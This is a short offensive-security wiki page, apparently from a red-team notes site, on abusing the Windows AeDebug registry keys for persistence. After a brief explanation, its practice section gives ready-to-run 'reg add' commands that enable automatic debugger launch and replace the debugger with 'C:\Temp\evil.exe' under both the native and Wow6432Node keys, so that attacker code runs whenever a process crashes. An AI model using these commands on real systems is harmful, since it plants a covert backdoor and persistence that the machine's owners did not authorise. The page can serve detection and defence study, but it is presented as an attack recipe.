AEDebug Keys Persistence
Theory
AEDebug Keys is a persistence and backdoor technique that leverages the Windows registry's Debugger property to execute a specified executable when a process crashes. The level of access gained depends on the security context of the debugged process. Additionally, if the Auto property of the same registry key is set to 1, the debugger launches automatically without requiring user interaction, further enhancing persistence.
Practice
By editing AEDebug, the original debugger exe will not start
You can run a malicious code instead of the debugger by editing Auto and Debugger values under following keys:
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebugHKCU\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug
# Starts without user interaction
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "1"
# Edit debugger
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Debugger" /d "C:\Temp\evil.exe"
#Or
# Starts without user interaction
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "1"
# Edit debugger
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Debugger" /d "C:\Temp\evil.exe"Resources
Last updated
Was this helpful?